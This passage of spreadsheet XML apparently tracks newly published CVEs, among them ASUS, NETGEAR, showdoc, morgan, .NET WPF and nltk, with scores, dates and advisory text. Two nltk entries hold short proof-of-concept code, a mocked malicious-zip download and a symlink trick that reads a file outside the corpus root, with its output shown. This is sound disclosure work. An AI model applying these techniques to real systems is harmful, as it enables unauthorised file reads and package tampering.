t="inlineStr" /><c r="L1558" s="5" t="inlineStr" /><c r="M1558" s="5" t="inlineStr" /><c r="N1558" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1558" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1558" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1558" s="5" t="inlineStr" /><c r="R1558" s="5" t="inlineStr"><is><t>CWE-782</t></is></c><c r="S1558" s="5" t="inlineStr"><is><t>Exposed IOCTL with Insufficient Access Control in Armoury Crate driver allows a local user to add an arbitrary process identifier to the driver's whitelist via a crafted IOCTL request by bypassing the driver's verification.Refer to the '
Security Update for Armoury Crate App  ' section on the ASUS Security Advisory for more information.</t></is></c><c r="T1558" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16003</t></is></c></row><row r="1559"><c r="A1559" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1559" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1559" s="5" t="inlineStr"><is><t>CVE-2026-86644</t></is></c><c r="D1559" s="5" t="n"><v>2</v></c><c r="E1559" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1559" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1559" s="5" t="inlineStr" /><c r="H1559" s="5" t="n"><v>0.003</v></c><c r="I1559" s="5" t="inlineStr" /><c r="J1559" s="5" t="inlineStr" /><c r="K1559" s="5" t="inlineStr" /><c r="L1559" s="5" t="inlineStr" /><c r="M1559" s="5" t="inlineStr" /><c r="N1559" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1559" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1559" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1559" s="5" t="inlineStr" /><c r="R1559" s="5" t="inlineStr"><is><t>CWE-79, CWE-94</t></is></c><c r="S1559" s="5" t="inlineStr"><is><t>A vulnerability was determined in star7th showdoc up to 3.9.1. This vulnerability affects unknown code of the file web_src/public/editor.md/editormd.js of the component API Page Save Endpoint. Executing a manipulation can lead to cross site scripting. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized. Upgrading to version 3.9.2 is able to resolve this issue. This patch is called a8ea1520850b4242f395247f72e87e597506cef0. Upgrading the affected component is recommended. The vendor confirms: "The fix [...] sets Mermaid `securityLevel` to `strict`, disables `htmlLabels`, and sanitizes rendered SVG with DOMPurify."</t></is></c><c r="T1559" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86644</t></is></c></row><row r="1560"><c r="A1560" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1560" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1560" s="5" t="inlineStr"><is><t>CVE-2026-86667</t></is></c><c r="D1560" s="5" t="n"><v>2</v></c><c r="E1560" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1560" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1560" s="5" t="inlineStr" /><c r="H1560" s="5" t="n"><v>0.002</v></c><c r="I1560" s="5" t="inlineStr" /><c r="J1560" s="5" t="inlineStr" /><c r="K1560" s="5" t="inlineStr" /><c r="L1560" s="5" t="inlineStr" /><c r="M1560" s="5" t="inlineStr" /><c r="N1560" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1560" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1560" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1560" s="5" t="inlineStr" /><c r="R1560" s="5" t="inlineStr"><is><t>CWE-74, CWE-89</t></is></c><c r="S1560" s="5" t="inlineStr"><is><t>A weakness has been identified in aircheng-org iWebShop-5 up to 5.15. The affected element is the function member_list of the file controllers/member.php. This manipulation of the argument Search causes sql injection. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="T1560" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86667</t></is></c></row><row r="1561"><c r="A1561" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1561" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1561" s="5" t="inlineStr"><is><t>CVE-2026-9215</t></is></c><c r="D1561" s="5" t="n"><v>1.8</v></c><c r="E1561" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1561" s="5" t="inlineStr"><is><t>a2826606-91e7-4eb6-899e-8484bd4575d5</t></is></c><c r="G1561" s="5" t="inlineStr" /><c r="H1561" s="5" t="n"><v>0.001</v></c><c r="I1561" s="5" t="inlineStr" /><c r="J1561" s="5" t="inlineStr" /><c r="K1561" s="5" t="inlineStr"><is><t>netgear:xr1000, netgear:xr1000_firmware, netgear:xr1000v2, netgear:xr1000v2_firmware, netgear:xr500, netgear:xr500_firmware</t></is></c><c r="L1561" s="5" t="inlineStr" /><c r="M1561" s="5" t="inlineStr" /><c r="N1561" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1561" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1561" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1561" s="5" t="inlineStr" /><c r="R1561" s="5" t="inlineStr"><is><t>CWE-352</t></is></c><c r="S1561" s="5" t="inlineStr"><is><t>A cross site request forgery (CSRF) vulnerability in the listed NETGEAR models allows an attacker who can leverage social engineering techniques on a router administrator to tamper with router configuration and disrupt router operations with active assistance from the router administrator. There is no confidentiality impact due to this vulnerability.</t></is></c><c r="T1561" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-9215</t></is></c></row><row r="1562"><c r="A1562" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1562" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1562" s="5" t="inlineStr"><is><t>CVE-2026-9216</t></is></c><c r="D1562" s="5" t="n"><v>1.2</v></c><c r="E1562" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1562" s="5" t="inlineStr"><is><t>a2826606-91e7-4eb6-899e-8484bd4575d5</t></is></c><c r="G1562" s="5" t="inlineStr" /><c r="H1562" s="5" t="n"><v>0.002</v></c><c r="I1562" s="5" t="inlineStr" /><c r="J1562" s="5" t="inlineStr" /><c r="K1562" s="5" t="inlineStr"><is><t>netgear:rax30, netgear:rax30_firmware, netgear:rax35, netgear:rax35_firmware, netgear:rax38, netgear:rax38_firmware, netgear:rax40, netgear:rax40_firmware, netgear:raxe300, netgear:raxe300_firmware</t></is></c><c r="L1562" s="5" t="inlineStr" /><c r="M1562" s="5" t="inlineStr" /><c r="N1562" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1562" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1562" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1562" s="5" t="inlineStr" /><c r="R1562" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S1562" s="5" t="inlineStr"><is><t>An insufficient input validation vulnerability in the listed NETGEAR RAX series models allows a network-adjacent attacker having network access (such as WiFi credentials) to crash the router's management UI. There is no confidentiality or integrity impact. A crash of the router's management UI does not impact the availability of the router's core services like WiFi network.</t></is></c><c r="T1562" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-9216</t></is></c></row><row r="1563"><c r="A1563" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1563" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1563" s="5" t="inlineStr"><is><t>CVE-2026-12259</t></is></c><c r="D1563" s="5" t="inlineStr" /><c r="E1563" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1563" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1563" s="5" t="inlineStr" /><c r="H1563" s="5" t="n"><v>0.001</v></c><c r="I1563" s="5" t="inlineStr" /><c r="J1563" s="5" t="inlineStr" /><c r="K1563" s="5" t="inlineStr" /><c r="L1563" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1563" s="5" t="inlineStr"><is><t>3.9.3</t></is></c><c r="N1563" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1563" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1563" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1563" s="5" t="inlineStr" /><c r="R1563" s="5" t="inlineStr" /><c r="S1563" s="5" t="inlineStr"><is><t>NLTK's package downloader in nltk/downloader.py does not verify file integrity after download and before extraction.

The download flow at lines 789-825:
1. File is downloaded to a temp path via HTTP
2. os.replace(tmp_filepath, filepath) moves it to the final location (line 799)
3. Extraction begins via _unzip_iter() (line 825)

Between steps 2 and 3, there is no SHA-256 verification. The checksum logic exists in _pkg_status() (lines 982-1015) but it is only used BEFORE download as a status check ("is this package already installed and up-to-date?"). It is never called after download to verify the file that was actually received.

Attack vectors:
1. MITM during HTTP download (NLTK downloads from http:// by default on some mirrors)
2. Race condition on shared filesystems (attacker replaces file between os.replace and _unzip_iter)
3. DNS poisoning redirecting to attacker-controlled server

PoC:
```python
import nltk
import unittest.mock
import zipfile
import io
import os

# Create a malicious zip that will be "downloaded"
malicious_zip = io.BytesIO()
with zipfile.ZipFile(malicious_zip, 'w') as zf:
    zf.writestr('punkt_tab/tokenizers/punkt_tab/english.pickle', 
                b'MALICIOUS PAYLOAD - attacker controlled content')

# Patch urllib to return our malicious zip
with unittest.mock.patch('urllib.request.urlopen') as mock_urlopen:
    mock_response = unittest.mock.MagicMock()
    mock_response.read.return_value = malicious_zip.getvalue()
    mock_response.headers = {'Content-Length': str(len(malicious_zip.getvalue()))}
    mock_urlopen.return_value = mock_response
    
    # Download proceeds, no integrity check catches the swap
    # nltk.download('punkt_tab')  # Would install attacker payload
```

This is distinct from CVE-2024-39705 (pickle deserialization via download) and CVE-2025-14009 (zip-slip path traversal). Those address what happens AFTER extraction. This finding addresses the gap BEFORE extraction where integrity is never verified.

Suggested fix: After os.replace() and before _unzip_iter(), compute SHA-256 of the final file and compare against the expected checksum from the package index. Reject and delete the file if the hash does not match.</t></is></c><c r="T1563" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12259</t></is></c></row><row r="1564"><c r="A1564" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1564" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1564" s="5" t="inlineStr"><is><t>CVE-2026-15603</t></is></c><c r="D1564" s="5" t="inlineStr" /><c r="E1564" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1564" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1564" s="5" t="inlineStr" /><c r="H1564" s="5" t="n"><v>0.002</v></c><c r="I1564" s="5" t="inlineStr" /><c r="J1564" s="5" t="inlineStr" /><c r="K1564" s="5" t="inlineStr" /><c r="L1564" s="5" t="inlineStr"><is><t>npm:morgan</t></is></c><c r="M1564" s="5" t="inlineStr"><is><t>1.12.0</t></is></c><c r="N1564" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1564" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1564" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1564" s="5" t="inlineStr" /><c r="R1564" s="5" t="inlineStr" /><c r="S1564" s="5" t="inlineStr"><is><t>### Impact

Morgan writes attacker-controlled request data to the access log through its tokens. The 1.11.0 fix neutralizes C0 control characters, DEL, and backslash, but it does not escape the Unicode line separators `U+0085` (NEL), `U+2028` (LINE SEPARATOR), or `U+2029` (PARAGRAPH SEPARATOR). These code points are reachable through several tokens, including the request URL (`:url`), request headers such as `:user-agent` and `:referrer`, arbitrary `:req[header]` values, and the Basic auth username (`:remote-user`). NEL is valid `obs-text` in HTTP header values, so an attacker can place it in an ordinary request header.

When such a value is logged, the raw code points survive into the emitted access-log record, and downstream ECMAScript-aware or Unicode-aware log processing splits the single physical record into multiple logical records. This allows an attacker to forge log entries. The built-in `combined`, `common`, `default`, and `short` formats are affected, as well as any custom format. This is an incomplete fix of CVE-2026-5078.

### Patches

Users should upgrade to version 1.12.0.

### Workarounds

None. The affected values include the request URL and request headers, which are core to access logging, so there is no practical format-based mitigation. Upgrade to 1.12.0.</t></is></c><c r="T1564" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-15603</t></is></c></row><row r="1565"><c r="A1565" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1565" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1565" s="5" t="inlineStr"><is><t>CVE-2026-45219</t></is></c><c r="D1565" s="5" t="inlineStr" /><c r="E1565" s="5" t="inlineStr" /><c r="F1565" s="5" t="inlineStr" /><c r="G1565" s="5" t="inlineStr" /><c r="H1565" s="5" t="inlineStr" /><c r="I1565" s="5" t="inlineStr" /><c r="J1565" s="5" t="inlineStr" /><c r="K1565" s="5" t="inlineStr" /><c r="L1565" s="5" t="inlineStr" /><c r="M1565" s="5" t="inlineStr" /><c r="N1565" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1565" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1565" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1565" s="5" t="inlineStr" /><c r="R1565" s="5" t="inlineStr" /><c r="S1565" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="T1565" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45219</t></is></c></row><row r="1566"><c r="A1566" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1566" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1566" s="5" t="inlineStr"><is><t>CVE-2026-45220</t></is></c><c r="D1566" s="5" t="inlineStr" /><c r="E1566" s="5" t="inlineStr" /><c r="F1566" s="5" t="inlineStr" /><c r="G1566" s="5" t="inlineStr" /><c r="H1566" s="5" t="inlineStr" /><c r="I1566" s="5" t="inlineStr" /><c r="J1566" s="5" t="inlineStr" /><c r="K1566" s="5" t="inlineStr" /><c r="L1566" s="5" t="inlineStr" /><c r="M1566" s="5" t="inlineStr" /><c r="N1566" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1566" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1566" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1566" s="5" t="inlineStr" /><c r="R1566" s="5" t="inlineStr" /><c r="S1566" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="T1566" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45220</t></is></c></row><row r="1567"><c r="A1567" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1567" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1567" s="5" t="inlineStr"><is><t>CVE-2026-49153</t></is></c><c r="D1567" s="5" t="inlineStr" /><c r="E1567" s="5" t="inlineStr" /><c r="F1567" s="5" t="inlineStr" /><c r="G1567" s="5" t="inlineStr" /><c r="H1567" s="5" t="inlineStr" /><c r="I1567" s="5" t="inlineStr" /><c r="J1567" s="5" t="inlineStr" /><c r="K1567" s="5" t="inlineStr" /><c r="L1567" s="5" t="inlineStr" /><c r="M1567" s="5" t="inlineStr" /><c r="N1567" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1567" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1567" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1567" s="5" t="inlineStr" /><c r="R1567" s="5" t="inlineStr" /><c r="S1567" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="T1567" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49153</t></is></c></row><row r="1568"><c r="A1568" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1568" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1568" s="5" t="inlineStr"><is><t>CVE-2026-49154</t></is></c><c r="D1568" s="5" t="inlineStr" /><c r="E1568" s="5" t="inlineStr" /><c r="F1568" s="5" t="inlineStr" /><c r="G1568" s="5" t="inlineStr" /><c r="H1568" s="5" t="inlineStr" /><c r="I1568" s="5" t="inlineStr" /><c r="J1568" s="5" t="inlineStr" /><c r="K1568" s="5" t="inlineStr" /><c r="L1568" s="5" t="inlineStr" /><c r="M1568" s="5" t="inlineStr" /><c r="N1568" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1568" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1568" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1568" s="5" t="inlineStr" /><c r="R1568" s="5" t="inlineStr" /><c r="S1568" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="T1568" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49154</t></is></c></row><row r="1569"><c r="A1569" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1569" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1569" s="5" t="inlineStr"><is><t>CVE-2026-49155</t></is></c><c r="D1569" s="5" t="inlineStr" /><c r="E1569" s="5" t="inlineStr" /><c r="F1569" s="5" t="inlineStr" /><c r="G1569" s="5" t="inlineStr" /><c r="H1569" s="5" t="inlineStr" /><c r="I1569" s="5" t="inlineStr" /><c r="J1569" s="5" t="inlineStr" /><c r="K1569" s="5" t="inlineStr" /><c r="L1569" s="5" t="inlineStr" /><c r="M1569" s="5" t="inlineStr" /><c r="N1569" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1569" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1569" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1569" s="5" t="inlineStr" /><c r="R1569" s="5" t="inlineStr" /><c r="S1569" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="T1569" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49155</t></is></c></row><row r="1570"><c r="A1570" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1570" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1570" s="5" t="inlineStr"><is><t>CVE-2026-49156</t></is></c><c r="D1570" s="5" t="inlineStr" /><c r="E1570" s="5" t="inlineStr" /><c r="F1570" s="5" t="inlineStr" /><c r="G1570" s="5" t="inlineStr" /><c r="H1570" s="5" t="inlineStr" /><c r="I1570" s="5" t="inlineStr" /><c r="J1570" s="5" t="inlineStr" /><c r="K1570" s="5" t="inlineStr" /><c r="L1570" s="5" t="inlineStr" /><c r="M1570" s="5" t="inlineStr" /><c r="N1570" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1570" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1570" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1570" s="5" t="inlineStr" /><c r="R1570" s="5" t="inlineStr" /><c r="S1570" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="T1570" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49156</t></is></c></row><row r="1571"><c r="A1571" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1571" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1571" s="5" t="inlineStr"><is><t>CVE-2026-50646</t></is></c><c r="D1571" s="5" t="inlineStr" /><c r="E1571" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1571" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1571" s="5" t="inlineStr" /><c r="H1571" s="5" t="n"><v>0.01</v></c><c r="I1571" s="5" t="inlineStr" /><c r="J1571" s="5" t="inlineStr" /><c r="K1571" s="5" t="inlineStr" /><c r="L1571" s="5" t="inlineStr"><is><t>NuGet:Microsoft.WindowsDesktop.App.Runtime.win-arm64, NuGet:Microsoft.WindowsDesktop.App.Runtime.win-x64, NuGet:Microsoft.WindowsDesktop.App.Runtime.win-x86</t></is></c><c r="M1571" s="5" t="inlineStr"><is><t>10.0.10, 8.0.29, 9.0.18</t></is></c><c r="N1571" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1571" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1571" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1571" s="5" t="inlineStr" /><c r="R1571" s="5" t="inlineStr" /><c r="S1571" s="5" t="inlineStr"><is><t>## Executive summary

Microsoft is releasing this security advisory to provide information about a vulnerability in Windows Presentation Foundation (WPF). This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.

A remote code execution vulnerability exists in Windows Presentation Foundation (WPF) in .NET 8, .NET 9, and .NET 10 when parsing specially crafted XAML input. An attacker who successfully exploits this vulnerability could execute arbitrary code in the context of the current user.

## Announcement

Announcement for this issue can be found at https://github.com/dotnet/announcements/issues/**TBD**

## CVSS Details

- **Version:** 3.1
- **Severity:** High
- **Score:** 7.8
- **Vector:** `CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H`
- **Weakness:** CWE-693 (Protection Mechanism Failure)

## Affected Platforms

- **Platforms:** Windows
- **Architectures:** All

## &lt;a name="affected-packages"&gt;&lt;/a&gt;Affected Packages
The vulnerability affects any Microsoft .NET project if it uses any of affected package versions listed below

### &lt;a name=".NET 10.0"&gt;&lt;/a&gt;.NET 10.0
Package name | Affected version | Patched version
------------ | ---------------- | -------------------------
[Microsoft.WindowsDesktop.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-arm64)               | &gt;= 10.0.0, &lt;= 10.0.9 | 10.0.10
[Microsoft.WindowsDesktop.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-x64)               | &gt;= 10.0.0, &lt;= 10.0.9 | 10.0.10
[Microsoft.WindowsDesktop.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-x86)               | &gt;= 10.0.0, &lt;= 10.0.9 | 10.0.10

### &lt;a name=".NET 9.0"&gt;&lt;/a&gt;.NET 9.0
Package name | Affected version | Patched version
------------ | ---------------- | -------------------------
[Microsoft.WindowsDesktop.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-arm64)               | &gt;= 9.0.0, &lt;= 9.0.17 | 9.0.18
[Microsoft.WindowsDesktop.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-x64)               | &gt;= 9.0.0, &lt;= 9.0.17 | 9.0.18
[Microsoft.WindowsDesktop.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-x86)               | &gt;= 9.0.0, &lt;= 9.0.17 | 9.0.18

### &lt;a name=".NET 8.0"&gt;&lt;/a&gt;.NET 8.0
Package name | Affected version | Patched version
------------ | ---------------- | -------------------------
[Microsoft.WindowsDesktop.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-arm64)               | &gt;= 8.0.0, &lt;= 8.0.28 | 8.0.29
[Microsoft.WindowsDesktop.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-x64)               | &gt;= 8.0.0, &lt;= 8.0.28 | 8.0.29
[Microsoft.WindowsDesktop.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-x86)               | &gt;= 8.0.0, &lt;= 8.0.28 | 8.0.29

## Advisory FAQ

### &lt;a name="how-affected"&gt;&lt;/a&gt;How do I know if I am affected?

If using a package listed in [affected packages](#affected-packages), developers exposed to the vulnerability.

### &lt;a name="how-fix"&gt;&lt;/a&gt;How do I fix the issue?

1. To fix the issue please install the latest version of .NET. If developers have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt them to update Visual Studio, which will also update their .NET SDKs.
2. If their application references the vulnerable nuget package, update the package reference to the patched version. Developers can list the versions they have installed by running the `dotnet --info` command.

Once developers have installed the updated runtime or SDK, they should restart their apps for the update to take effect.

Additionally, if they've deployed [self-contained applications](https://docs.microsoft.com/dotnet/core/deploying/#self-contained-deployments-scd) targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed.

## Other Information

### Reporting Security Issues

If anyone has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Direct questions about this issue to GitHub in the .NET GitHub organization. The main repos are located at https://github.com/dotnet/runtime. The Announcements repo (https://github.com/dotnet/Announcements) will contain this bulletin as an issue and will include a link to a discussion issue. Users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[CVE-2026-50646]( https://www.cve.org/CVERecord?id=CVE-2026-50646)

### Acknowledgements

Kevin Gosse, 41ae55e9310ff27fa6f26af4727e5590, Ky0toFu

### Revisions

V1.0 (July 14, 2026): Advisory published.</t></is></c><c r="T1571" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-50646</t></is></c></row><row r="1572"><c r="A1572" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1572" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1572" s="5" t="inlineStr"><is><t>CVE-2026-62383</t></is></c><c r="D1572" s="5" t="inlineStr" /><c r="E1572" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1572" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1572" s="5" t="inlineStr" /><c r="H1572" s="5" t="n"><v>0.002</v></c><c r="I1572" s="5" t="inlineStr" /><c r="J1572" s="5" t="inlineStr" /><c r="K1572" s="5" t="inlineStr" /><c r="L1572" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1572" s="5" t="inlineStr"><is><t>3.10.2</t></is></c><c r="N1572" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1572" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1572" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1572" s="5" t="inlineStr" /><c r="R1572" s="5" t="inlineStr" /><c r="S1572" s="5" t="inlineStr"><is><t>## Summary

`IPIPANCorpusReader` (`nltk/corpus/reader/ipipan.py`) exposes public methods, `channels()`, `domains()`, `categories()`, and `fileids(channels=...)`, that accept a caller supplied `fileids` list and read a file via a completely unprotected builtin `open()` call, with no `nltk.pathsec` involvement at all. A symlink placed inside the corpus root, with a name containing no separators or `..`, passes NLTK's existing traversal checks and is opened directly, reading a file from anywhere on the filesystem the process can access.

## Root cause

All four methods route through `_get_tag()`:

```python
def _get_tag(self, f, tag):
    tags = []
    with open(f) as infile:   # builtin open(), no pathsec involvement
        header = infile.read()
    ...
```

`f` arrives via `_list_header_files()` / `_list_morph_files_by()`, both of which call:

```python
f.replace("morph.xml", "header.xml")
```

on the result of `self.abspath(...)` or `self.abspaths(...)`. `FileSystemPathPointer` subclasses `str`, so `.replace()` returns a plain Python string, silently discarding the `PathPointer` wrapper. That plain string is handed straight to builtin `open()`.

This is a more severe variant of the same CWE-59 class already fixed elsewhere in this codebase (`CorpusReader.open()`, `NKJPCorpusReader.add_root()`, and the recent `FramenetCorpusReader` fix): those route file access through `nltk.pathsec.validate_path()`, at minimum the global, non-scoped check, before opening. Here, converting the `PathPointer` to a plain string before calling `open()` skips `pathsec` completely, not just the corpus-root-scoped check, so the symlink target does not even need to land under a registered `nltk.data.path` root.

Plain literal `../` traversal in the fileid is still blocked by `FileSystemPathPointer.join()`, so this is specifically the symlink variant, not a regression of the older, simpler traversal class.

## Proof of concept

Constructed the normal, documented way, `fileids` as a regex over file paths, so the reader auto-discovers whatever `.xml` files exist in its root with no special knowledge of the planted symlink.

```python
import os
import tempfile

from nltk.corpus.reader.ipipan import IPIPANCorpusReader

root = tempfile.mkdtemp()
corpus_root = os.path.join(root, "ipipan")
os.makedirs(corpus_root)

with open(os.path.join(corpus_root, "real_morph.xml"), "w") as f:
    f.write("&lt;channel&gt;legit&lt;/channel&gt;")

secret_dir = os.path.join(root, "outside_ipipan_root")
os.makedirs(secret_dir)
secret_path = os.path.join(secret_dir, "stolen.xml")
with open(secret_path, "w") as f:
    f.write("&lt;channel&gt;TOP-SECRET-CHANNEL-DATA-FROM-OUTSIDE-CORPUS-ROOT&lt;/channel&gt;")

os.symlink(secret_path, os.path.join(corpus_root, "evil_link.xml"))

reader = IPIPANCorpusReader(corpus_root, r".*\.xml")
print("Auto-discovered fileids:", sorted(reader.fileids()))

result = reader.channels(fileids=["evil_link.xml"])
print(result)
```

Actual output when run against current `develop`:

```
Auto-discovered fileids: ['evil_link.xml', 'real_morph.xml']
['TOP-SECRET-CHANNEL-DATA-FROM-OUTSIDE-CORPUS-ROOT']
```

That content was read from `secret_path`, a file entirely outside `corpus_root`. No exception raised anywhere. The planted symlink even surfaces naturally in the reader's own `fileids()` listing, exactly as a real file would.

Verified separately that literal `../` traversal in the fileid is still rejected (`ValueError: Traversal blocked`), confirming this is specifically the symlink gap, not a broader regression.

## Why this is in scope

